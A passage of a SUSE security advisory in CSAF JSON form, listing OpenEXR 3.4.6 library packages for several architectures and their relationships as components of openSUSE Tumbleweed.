"name": "libIlmThread-3_4-33-3.4.6-1.1.aarch64",
"product": {
"name": "libIlmThread-3_4-33-3.4.6-1.1.aarch64",
"product_id": "libIlmThread-3_4-33-3.4.6-1.1.aarch64"
}
},
{
"category": "product_version",
"name": "libIlmThread-3_4-33-32bit-3.4.6-1.1.aarch64",
"product": {
"name": "libIlmThread-3_4-33-32bit-3.4.6-1.1.aarch64",
"product_id": "libIlmThread-3_4-33-32bit-3.4.6-1.1.aarch64"
}
},
{
"category": "product_version",
"name": "libIlmThread-3_4-33-x86-64-v3-3.4.6-1.1.aarch64",
"product": {
"name": "libIlmThread-3_4-33-x86-64-v3-3.4.6-1.1.aarch64",
"product_id": "libIlmThread-3_4-33-x86-64-v3-3.4.6-1.1.aarch64"
}
},
{
"category": "product_version",
"name": "libOpenEXR-3_4-33-3.4.6-1.1.aarch64",
"product": {
"name": "libOpenEXR-3_4-33-3.4.6-1.1.aarch64",
"product_id": "libOpenEXR-3_4-33-3.4.6-1.1.aarch64"
}
},
{
"category": "product_version",
"name": "libOpenEXR-3_4-33-32bit-3.4.6-1.1.aarch64",
"product": {
"name": "libOpenEXR-3_4-33-32bit-3.4.6-1.1.aarch64",
"product_id": "libOpenEXR-3_4-33-32bit-3.4.6-1.1.aarch64"
}
},
{
"category": "product_version",
"name": "libOpenEXR-3_4-33-x86-64-v3-3.4.6-1.1.aarch64",
"product": {
"name": "libOpenEXR-3_4-33-x86-64-v3-3.4.6-1.1.aarch64",
"product_id": "libOpenEXR-3_4-33-x86-64-v3-3.4.6-1.1.aarch64"
}
},
{
"category": "product_version",
"name": "libOpenEXRCore-3_4-33-3.4.6-1.1.aarch64",
"product": {
"name": "libOpenEXRCore-3_4-33-3.4.6-1.1.aarch64",
"product_id": "libOpenEXRCore-3_4-33-3.4.6-1.1.aarch64"
}
},
{
"category": "product_version",
"name": "libOpenEXRCore-3_4-33-32bit-3.4.6-1.1.aarch64",
"product": {
"name": "libOpenEXRCore-3_4-33-32bit-3.4.6-1.1.aarch64",
"product_id": "libOpenEXRCore-3_4-33-32bit-3.4.6-1.1.aarch64"
}
},
{
"category": "product_version",
"name": "libOpenEXRCore-3_4-33-x86-64-v3-3.4.6-1.1.aarch64",
"product": {
"name": "libOpenEXRCore-3_4-33-x86-64-v3-3.4.6-1.1.aarch64",
"product_id": "libOpenEXRCore-3_4-33-x86-64-v3-3.4.6-1.1.aarch64"
}
},
{
"category": "product_version",
"name": "libOpenEXRUtil-3_4-33-3.4.6-1.1.aarch64",
"product": {
"name": "libOpenEXRUtil-3_4-33-3.4.6-1.1.aarch64",
"product_id": "libOpenEXRUtil-3_4-33-3.4.6-1.1.aarch64"
}
},
{
"category": "product_version",
"name": "libOpenEXRUtil-3_4-33-32bit-3.4.6-1.1.aarch64",
"product": {
"name": "libOpenEXRUtil-3_4-33-32bit-3.4.6-1.1.aarch64",
"product_id": "libOpenEXRUtil-3_4-33-32bit-3.4.6-1.1.aarch64"
}
},
{
"category": "product_version",
"name": "libOpenEXRUtil-3_4-33-x86-64-v3-3.4.6-1.1.aarch64",
"product": {
"name": "libOpenEXRUtil-3_4-33-x86-64-v3-3.4.6-1.1.aarch64",
"product_id": "libOpenEXRUtil-3_4-33-x86-64-v3-3.4.6-1.1.aarch64"
}
},
{
"category": "product_version",
"name": "openexr-3.4.6-1.1.aarch64",
"product": {
"name": "openexr-3.4.6-1.1.aarch64",
"product_id": "openexr-3.4.6-1.1.aarch64"
}
},
{
"category": "product_version",
"name": "openexr-devel-3.4.6-1.1.aarch64",
"product": {
"name": "openexr-devel-3.4.6-1.1.aarch64",
"product_id": "openexr-devel-3.4.6-1.1.aarch64"
}
},
{
"category": "product_version",
"name": "openexr-doc-3.4.6-1.1.aarch64",
"product": {
"name": "openexr-doc-3.4.6-1.1.aarch64",
"product_id": "openexr-doc-3.4.6-1.1.aarch64"
}
}
],
"category": "architecture",
"name": "aarch64"
},
{
"branches": [
{
"category": "product_version",
"name": "libIex-3_4-33-3.4.6-1.1.ppc64le",
"product": {
"name": "libIex-3_4-33-3.4.6-1.1.ppc64le",
"product_id": "libIex-3_4-33-3.4.6-1.1.ppc64le"
}
},
{
"category": "product_version",
"name": "libIex-3_4-33-32bit-3.4.6-1.1.ppc64le",
"product": {
"name": "libIex-3_4-33-32bit-3.4.6-1.1.ppc64le",
"product_id": "libIex-3_4-33-32bit-3.4.6-1.1.ppc64le"
}
},
{
"category": "product_version",
"name": "libIex-3_4-33-x86-64-v3-3.4.6-1.1.ppc64le",
"product": {
"name": "libIex-3_4-33-x86-64-v3-3.4.6-1.1.ppc64le",
"product_id": "libIex-3_4-33-x86-64-v3-3.4.6-1.1.ppc64le"
}
},
{
"category": "product_version",
"name": "libIlmThread-3_4-33-3.4.6-1.1.ppc64le",
"product": {
"name": "libIlmThread-3_4-33-3.4.6-1.1.ppc64le",
"product_id": "libIlmThread-3_4-33-3.4.6-1.1.ppc64le"
}
},
{
"category": "product_version",
"name": "libIlmThread-3_4-33-32bit-3.4.6-1.1.ppc64le",
"product": {
"name": "libIlmThread-3_4-33-32bit-3.4.6-1.1.ppc64le",
"product_id": "libIlmThread-3_4-33-32bit-3.4.6-1.1.ppc64le"
}
},
{
"category": "product_version",
"name": "libIlmThread-3_4-33-x86-64-v3-3.4.6-1.1.ppc64le",
"product": {
"name": "libIlmThread-3_4-33-x86-64-v3-3.4.6-1.1.ppc64le",
"product_id": "libIlmThread-3_4-33-x86-64-v3-3.4.6-1.1.ppc64le"
}
},
{
"category": "product_version",
"name": "libOpenEXR-3_4-33-3.4.6-1.1.ppc64le",
"product": {
"name": "libOpenEXR-3_4-33-3.4.6-1.1.ppc64le",
"product_id": "libOpenEXR-3_4-33-3.4.6-1.1.ppc64le"
}
},
{
"category": "product_version",
"name": "libOpenEXR-3_4-33-32bit-3.4.6-1.1.ppc64le",
"product": {
"name": "libOpenEXR-3_4-33-32bit-3.4.6-1.1.ppc64le",
"product_id": "libOpenEXR-3_4-33-32bit-3.4.6-1.1.ppc64le"
}
},
{
"category": "product_version",
"name": "libOpenEXR-3_4-33-x86-64-v3-3.4.6-1.1.ppc64le",
"product": {
"name": "libOpenEXR-3_4-33-x86-64-v3-3.4.6-1.1.ppc64le",
"product_id": "libOpenEXR-3_4-33-x86-64-v3-3.4.6-1.1.ppc64le"
}
},
{
"category": "product_version",
"name": "libOpenEXRCore-3_4-33-3.4.6-1.1.ppc64le",
"product": {
"name": "libOpenEXRCore-3_4-33-3.4.6-1.1.ppc64le",
"product_id": "libOpenEXRCore-3_4-33-3.4.6-1.1.ppc64le"
}
},
{
"category": "product_version",
"name": "libOpenEXRCore-3_4-33-32bit-3.4.6-1.1.ppc64le",
"product": {
"name": "libOpenEXRCore-3_4-33-32bit-3.4.6-1.1.ppc64le",
"product_id": "libOpenEXRCore-3_4-33-32bit-3.4.6-1.1.ppc64le"
}
},
{
"category": "product_version",
"name": "libOpenEXRCore-3_4-33-x86-64-v3-3.4.6-1.1.ppc64le",
"product": {
"name": "libOpenEXRCore-3_4-33-x86-64-v3-3.4.6-1.1.ppc64le",
"product_id": "libOpenEXRCore-3_4-33-x86-64-v3-3.4.6-1.1.ppc64le"
}
},
{
"category": "product_version",
"name": "libOpenEXRUtil-3_4-33-3.4.6-1.1.ppc64le",
"product": {
"name": "libOpenEXRUtil-3_4-33-3.4.6-1.1.ppc64le",
"product_id": "libOpenEXRUtil-3_4-33-3.4.6-1.1.ppc64le"
}
},
{
"category": "product_version",
"name": "libOpenEXRUtil-3_4-33-32bit-3.4.6-1.1.ppc64le",
"product": {
"name": "libOpenEXRUtil-3_4-33-32bit-3.4.6-1.1.ppc64le",
"product_id": "libOpenEXRUtil-3_4-33-32bit-3.4.6-1.1.ppc64le"
}
},
{
"category": "product_version",
"name": "libOpenEXRUtil-3_4-33-x86-64-v3-3.4.6-1.1.ppc64le",
"product": {
"name": "libOpenEXRUtil-3_4-33-x86-64-v3-3.4.6-1.1.ppc64le",
"product_id": "libOpenEXRUtil-3_4-33-x86-64-v3-3.4.6-1.1.ppc64le"
}
},
{
"category": "product_version",
"name": "openexr-3.4.6-1.1.ppc64le",
"product": {
"name": "openexr-3.4.6-1.1.ppc64le",
"product_id": "openexr-3.4.6-1.1.ppc64le"
}
},
{
"category": "product_version",
"name": "openexr-devel-3.4.6-1.1.ppc64le",
"product": {
"name": "openexr-devel-3.4.6-1.1.ppc64le",
"product_id": "openexr-devel-3.4.6-1.1.ppc64le"
}
},
{
"category": "product_version",
"name": "openexr-doc-3.4.6-1.1.ppc64le",
"product": {
"name": "openexr-doc-3.4.6-1.1.ppc64le",
"product_id": "openexr-doc-3.4.6-1.1.ppc64le"
}
}
],
"category": "architecture",
"name": "ppc64le"
},
{
"branches": [
{
"category": "product_version",
"name": "libIex-3_4-33-3.4.6-1.1.s390x",
"product": {
"name": "libIex-3_4-33-3.4.6-1.1.s390x",
"product_id": "libIex-3_4-33-3.4.6-1.1.s390x"
}
},
{
"category": "product_version",
"name": "libIex-3_4-33-32bit-3.4.6-1.1.s390x",
"product": {
"name": "libIex-3_4-33-32bit-3.4.6-1.1.s390x",
"product_id": "libIex-3_4-33-32bit-3.4.6-1.1.s390x"
}
},
{
"category": "product_version",
"name": "libIex-3_4-33-x86-64-v3-3.4.6-1.1.s390x",
"product": {
"name": "libIex-3_4-33-x86-64-v3-3.4.6-1.1.s390x",
"product_id": "libIex-3_4-33-x86-64-v3-3.4.6-1.1.s390x"
}
},
{
"category": "product_version",
"name": "libIlmThread-3_4-33-3.4.6-1.1.s390x",
"product": {
"name": "libIlmThread-3_4-33-3.4.6-1.1.s390x",
"product_id": "libIlmThread-3_4-33-3.4.6-1.1.s390x"
}
},
{
"category": "product_version",
"name": "libIlmThread-3_4-33-32bit-3.4.6-1.1.s390x",
"product": {
"name": "libIlmThread-3_4-33-32bit-3.4.6-1.1.s390x",
"product_id": "libIlmThread-3_4-33-32bit-3.4.6-1.1.s390x"
}
},
{
"category": "product_version",
"name": "libIlmThread-3_4-33-x86-64-v3-3.4.6-1.1.s390x",
"product": {
"name": "libIlmThread-3_4-33-x86-64-v3-3.4.6-1.1.s390x",
"product_id": "libIlmThread-3_4-33-x86-64-v3-3.4.6-1.1.s390x"
}
},
{
"category": "product_version",
"name": "libOpenEXR-3_4-33-3.4.6-1.1.s390x",
"product": {
"name": "libOpenEXR-3_4-33-3.4.6-1.1.s390x",
"product_id": "libOpenEXR-3_4-33-3.4.6-1.1.s390x"
}
},
{
"category": "product_version",
"name": "libOpenEXR-3_4-33-32bit-3.4.6-1.1.s390x",
"product": {
"name": "libOpenEXR-3_4-33-32bit-3.4.6-1.1.s390x",
"product_id": "libOpenEXR-3_4-33-32bit-3.4.6-1.1.s390x"
}
},
{
"category": "product_version",
"name": "libOpenEXR-3_4-33-x86-64-v3-3.4.6-1.1.s390x",
"product": {
"name": "libOpenEXR-3_4-33-x86-64-v3-3.4.6-1.1.s390x",
"product_id": "libOpenEXR-3_4-33-x86-64-v3-3.4.6-1.1.s390x"
}
},
{
"category": "product_version",
"name": "libOpenEXRCore-3_4-33-3.4.6-1.1.s390x",
"product": {
"name": "libOpenEXRCore-3_4-33-3.4.6-1.1.s390x",
"product_id": "libOpenEXRCore-3_4-33-3.4.6-1.1.s390x"
}
},
{
"category": "product_version",
"name": "libOpenEXRCore-3_4-33-32bit-3.4.6-1.1.s390x",
"product": {
"name": "libOpenEXRCore-3_4-33-32bit-3.4.6-1.1.s390x",
"product_id": "libOpenEXRCore-3_4-33-32bit-3.4.6-1.1.s390x"
}
},
{
"category": "product_version",
"name": "libOpenEXRCore-3_4-33-x86-64-v3-3.4.6-1.1.s390x",
"product": {
"name": "libOpenEXRCore-3_4-33-x86-64-v3-3.4.6-1.1.s390x",
"product_id": "libOpenEXRCore-3_4-33-x86-64-v3-3.4.6-1.1.s390x"
}
},
{
"category": "product_version",
"name": "libOpenEXRUtil-3_4-33-3.4.6-1.1.s390x",
"product": {
"name": "libOpenEXRUtil-3_4-33-3.4.6-1.1.s390x",
"product_id": "libOpenEXRUtil-3_4-33-3.4.6-1.1.s390x"
}
},
{
"category": "product_version",
"name": "libOpenEXRUtil-3_4-33-32bit-3.4.6-1.1.s390x",
"product": {
"name": "libOpenEXRUtil-3_4-33-32bit-3.4.6-1.1.s390x",
"product_id": "libOpenEXRUtil-3_4-33-32bit-3.4.6-1.1.s390x"
}
},
{
"category": "product_version",
"name": "libOpenEXRUtil-3_4-33-x86-64-v3-3.4.6-1.1.s390x",
"product": {
"name": "libOpenEXRUtil-3_4-33-x86-64-v3-3.4.6-1.1.s390x",
"product_id": "libOpenEXRUtil-3_4-33-x86-64-v3-3.4.6-1.1.s390x"
}
},
{
"category": "product_version",
"name": "openexr-3.4.6-1.1.s390x",
"product": {
"name": "openexr-3.4.6-1.1.s390x",
"product_id": "openexr-3.4.6-1.1.s390x"
}
},
{
"category": "product_version",
"name": "openexr-devel-3.4.6-1.1.s390x",
"product": {
"name": "openexr-devel-3.4.6-1.1.s390x",
"product_id": "openexr-devel-3.4.6-1.1.s390x"
}
},
{
"category": "product_version",
"name": "openexr-doc-3.4.6-1.1.s390x",
"product": {
"name": "openexr-doc-3.4.6-1.1.s390x",
"product_id": "openexr-doc-3.4.6-1.1.s390x"
}
}
],
"category": "architecture",
"name": "s390x"
},
{
"branches": [
{
"category": "product_version",
"name": "libIex-3_4-33-3.4.6-1.1.x86_64",
"product": {
"name": "libIex-3_4-33-3.4.6-1.1.x86_64",
"product_id": "libIex-3_4-33-3.4.6-1.1.x86_64"
}
},
{
"category": "product_version",
"name": "libIex-3_4-33-32bit-3.4.6-1.1.x86_64",
"product": {
"name": "libIex-3_4-33-32bit-3.4.6-1.1.x86_64",
"product_id": "libIex-3_4-33-32bit-3.4.6-1.1.x86_64"
}
},
{
"category": "product_version",
"name": "libIex-3_4-33-x86-64-v3-3.4.6-1.1.x86_64",
"product": {
"name": "libIex-3_4-33-x86-64-v3-3.4.6-1.1.x86_64",
"product_id": "libIex-3_4-33-x86-64-v3-3.4.6-1.1.x86_64"
}
},
{
"category": "product_version",
"name": "libIlmThread-3_4-33-3.4.6-1.1.x86_64",
"product": {
"name": "libIlmThread-3_4-33-3.4.6-1.1.x86_64",
"product_id": "libIlmThread-3_4-33-3.4.6-1.1.x86_64"
}
},
{
"category": "product_version",
"name": "libIlmThread-3_4-33-32bit-3.4.6-1.1.x86_64",
"product": {
"name": "libIlmThread-3_4-33-32bit-3.4.6-1.1.x86_64",
"product_id": "libIlmThread-3_4-33-32bit-3.4.6-1.1.x86_64"
}
},
{
"category": "product_version",
"name": "libIlmThread-3_4-33-x86-64-v3-3.4.6-1.1.x86_64",
"product": {
"name": "libIlmThread-3_4-33-x86-64-v3-3.4.6-1.1.x86_64",
"product_id": "libIlmThread-3_4-33-x86-64-v3-3.4.6-1.1.x86_64"
}
},
{
"category": "product_version",
"name": "libOpenEXR-3_4-33-3.4.6-1.1.x86_64",
"product": {
"name": "libOpenEXR-3_4-33-3.4.6-1.1.x86_64",
"product_id": "libOpenEXR-3_4-33-3.4.6-1.1.x86_64"
}
},
{
"category": "product_version",
"name": "libOpenEXR-3_4-33-32bit-3.4.6-1.1.x86_64",
"product": {
"name": "libOpenEXR-3_4-33-32bit-3.4.6-1.1.x86_64",
"product_id": "libOpenEXR-3_4-33-32bit-3.4.6-1.1.x86_64"
}
},
{
"category": "product_version",
"name": "libOpenEXR-3_4-33-x86-64-v3-3.4.6-1.1.x86_64",
"product": {
"name": "libOpenEXR-3_4-33-x86-64-v3-3.4.6-1.1.x86_64",
"product_id": "libOpenEXR-3_4-33-x86-64-v3-3.4.6-1.1.x86_64"
}
},
{
"category": "product_version",
"name": "libOpenEXRCore-3_4-33-3.4.6-1.1.x86_64",
"product": {
"name": "libOpenEXRCore-3_4-33-3.4.6-1.1.x86_64",
"product_id": "libOpenEXRCore-3_4-33-3.4.6-1.1.x86_64"
}
},
{
"category": "product_version",
"name": "libOpenEXRCore-3_4-33-32bit-3.4.6-1.1.x86_64",
"product": {
"name": "libOpenEXRCore-3_4-33-32bit-3.4.6-1.1.x86_64",
"product_id": "libOpenEXRCore-3_4-33-32bit-3.4.6-1.1.x86_64"
}
},
{
"category": "product_version",
"name": "libOpenEXRCore-3_4-33-x86-64-v3-3.4.6-1.1.x86_64",
"product": {
"name": "libOpenEXRCore-3_4-33-x86-64-v3-3.4.6-1.1.x86_64",
"product_id": "libOpenEXRCore-3_4-33-x86-64-v3-3.4.6-1.1.x86_64"
}
},
{
"category": "product_version",
"name": "libOpenEXRUtil-3_4-33-3.4.6-1.1.x86_64",
"product": {
"name": "libOpenEXRUtil-3_4-33-3.4.6-1.1.x86_64",
"product_id": "libOpenEXRUtil-3_4-33-3.4.6-1.1.x86_64"
}
},
{
"category": "product_version",
"name": "libOpenEXRUtil-3_4-33-32bit-3.4.6-1.1.x86_64",
"product": {
"name": "libOpenEXRUtil-3_4-33-32bit-3.4.6-1.1.x86_64",
"product_id": "libOpenEXRUtil-3_4-33-32bit-3.4.6-1.1.x86_64"
}
},
{
"category": "product_version",
"name": "libOpenEXRUtil-3_4-33-x86-64-v3-3.4.6-1.1.x86_64",
"product": {
"name": "libOpenEXRUtil-3_4-33-x86-64-v3-3.4.6-1.1.x86_64",
"product_id": "libOpenEXRUtil-3_4-33-x86-64-v3-3.4.6-1.1.x86_64"
}
},
{
"category": "product_version",
"name": "openexr-3.4.6-1.1.x86_64",
"product": {
"name": "openexr-3.4.6-1.1.x86_64",
"product_id": "openexr-3.4.6-1.1.x86_64"
}
},
{
"category": "product_version",
"name": "openexr-devel-3.4.6-1.1.x86_64",
"product": {
"name": "openexr-devel-3.4.6-1.1.x86_64",
"product_id": "openexr-devel-3.4.6-1.1.x86_64"
}
},
{
"category": "product_version",
"name": "openexr-doc-3.4.6-1.1.x86_64",
"product": {
"name": "openexr-doc-3.4.6-1.1.x86_64",
"product_id": "openexr-doc-3.4.6-1.1.x86_64"
}
}
],
"category": "architecture",
"name": "x86_64"
},
{
"branches": [
{
"category": "product_name",
"name": "openSUSE Tumbleweed",
"product": {
"name": "openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed",
"product_identification_helper": {
"cpe": "cpe:/o:opensuse:tumbleweed"
}
}
}
],
"category": "product_family",
"name": "SUSE Linux Enterprise"
}
],
"category": "vendor",
"name": "SUSE"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "libIex-3_4-33-3.4.6-1.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:libIex-3_4-33-3.4.6-1.1.aarch64"
},
"product_reference": "libIex-3_4-33-3.4.6-1.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libIex-3_4-33-3.4.6-1.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:libIex-3_4-33-3.4.6-1.1.ppc64le"
},
"product_reference": "libIex-3_4-33-3.4.6-1.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libIex-3_4-33-3.4.6-1.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:libIex-3_4-33-3.4.6-1.1.s390x"
},
"product_reference": "libIex-3_4-33-3.4.6-1.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libIex-3_4-33-3.4.6-1.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:libIex-3_4-33-3.4.6-1.1.x86_64"
},
"product_reference": "libIex-3_4-33-3.4.6-1.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libIex-3_4-33-32bit-3.4.6-1.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:libIex-3_4-33-32bit-3.4.6-1.1.aarch64"
},
"product_reference": "libIex-3_4-33-32bit-3.4.6-1.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libIex-3_4-33-32bit-3.4.6-1.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:libIex-3_4-33-32bit-3.4.6-1.1.ppc64le"
},
"product_reference": "libIex-3_4-33-32bit-3.4.6-1.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libIex-3_4-33-32bit-3.4.6-1.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:libIex-3_4-33-32bit-3.4.6-1.1.s390x"
},
"product_reference": "libIex-3_4-33-32bit-3.4.6-1.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libIex-3_4-33-32bit-3.4.6-1.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:libIex-3_4-33-32bit-3.4.6-1.1.x86_64"
},
"product_reference": "libIex-3_4-33-32bit-3.4.6-1.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libIex-3_4-33-x86-64-v3-3.4.6-1.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:libIex-3_4-33-x86-64-v3-3.4.6-1.1.aarch64"
},
"product_reference": "libIex-3_4-33-x86-64-v3-3.4.6-1.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libIex-3_4-33-x86-64-v3-3.4.6-1.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:libIex-3_4-33-x86-64-v3-3.4.6-1.1.ppc64le"
},
"product_reference": "libIex-3_4-33-x86-64-v3-3.4.6-1.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libIex-3_4-33-x86-64-v3-3.4.6-1.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:libIex-3_4-33-x86-64-v3-3.4.6-1.1.s390x"
},
"product_reference": "libIex-3_4-33-x86-64-v3-3.4.6-1.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libIex-3_4-33-x86-64-v3-3.4.6-1.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:libIex-3_4-33-x86-64-v3-3.4.6-1.1.x86_64"
},
"product_reference": "libIex-3_4-33-x86-64-v3-3.4.6-1.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libIlmThread-3_4-33-3.4.6-1.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:libIlmThread-3_4-33-3.4.6-1.1.aarch64"
},
"product_reference": "libIlmThread-3_4-33-3.4.6-1.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libIlmThread-3_4-33-3.4.6-1.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:libIlmThread-3_4-33-3.4.6-1.1.ppc64le"
},
"product_reference": "libIlmThread-3_4-33-3.4.6-1.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libIlmThread-3_4-33-3.4.6-1.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:libIlmThread-3_4-33-3.4.6-1.1.s390x"
},
"product_reference": "libIlmThread-3_4-33-3.4.6-1.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libIlmThread-3_4-33-3.4.6-1.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:libIlmThread-3_4-33-3.4.6-1.1.x86_64"
},
"product_reference": "libIlmThread-3_4-33-3.4.6-1.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libIlmThread-3_4-33-32bit-3.4.6-1.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:libIlmThread-3_4-33-32bit-3.4.6-1.1.aarch64"
},
"product_reference": "libIlmThread-3_4-33-32bit-3.4.6-1.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libIlmThread-3_4-33-32bit-3.4.6-1.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:libIlmThread-3_4-33-32bit-3.4.6-1.1.ppc64le"
},
"product_reference": "libIlmThread-3_4-33-32bit-3.4.6-1.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libIlmThread-3_4-33-32bit-3.4.6-1.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:libIlmThread-3_4-33-32bit-3.4.6-1.1.s390x"
},
"product_reference": "libIlmThread-3_4-33-32bit-3.4.6-1.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libIlmThread-3_4-33-32bit-3.4.6-1.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:libIlmThread-3_4-33-32bit-3.4.6-1.1.x86_64"
},
"product_reference": "libIlmThread-3_4-33-32bit-3.4.6-1.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libIlmThread-3_4-33-x86-64-v3-3.4.6-1.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:libIlmThread-3_4-33-x86-64-v3-3.4.6-1.1.aarch64"
},
"product_reference": "libIlmThread-3_4-33-x86-64-v3-3.4.6-1.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libIlmThread-3_4-33-x86-64-v3-3.4.6-1.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:libIlmThread-3_4-33-x86-64-v3-3.4.6-1.1.ppc64le"
},
"product_reference": "libIlmThread-3_4-33-x86-64-v3-3.4.6-1.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libIlmThread-3_4-33-x86-64-v3-3.4.6-1.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:libIlmThread-3_4-33-x86-64-v3-3.4.6-1.1.s390x"
},
"product_reference": "libIlmThread-3_4-33-x86-64-v3-3.4.6-1.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libIlmThread-3_4-33-x86-64-v3-3.4.6-1.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:libIlmThread-3_4-33-x86-64-v3-3.4.6-1.1.x86_64"
},
"product_reference": "libIlmThread-3_4-33-x86-64-v3-3.4.6-1.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libOpenEXR-3_4-33-3.4.6-1.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:libOpenEXR-3_4-33-3.4.6-1.1.aarch64"
},
"product_reference": "libOpenEXR-3_4-33-3.4.6-1.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libOpenEXR-3_4-33-3.4.6-1.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:libOpenEXR-3_4-33-3.4.6-1.1.ppc64le"
},
"product_reference": "libOpenEXR-3_4-33-3.4.6-1.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libOpenEXR-3_4-33-3.4.6-1.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:libOpenEXR-3_4-33-3.4.6-1.1.s390x"
},
"product_reference": "libOpenEXR-3_4-33-3.4.6-1.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libOpenEXR-3_4-33-3.4.6-1.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:libOpenEXR-3_4-33-3.4.6-1.1.x86_64"
},
"product_reference": "libOpenEXR-3_4-33-3.4.6-1.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libOpenEXR-3_4-33-32bit-3.4.6-1.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:libOpenEXR-3_4-33-32bit-3.4.6-1.1.aarch64"
},
"product_reference": "libOpenEXR-3_4-33-32bit-3.4.6-1.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libOpenEXR-3_4-33-32bit-3.4.6-1.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:libOpenEXR-3_4-33-32bit-3.4.6-1.1.ppc64le"
},
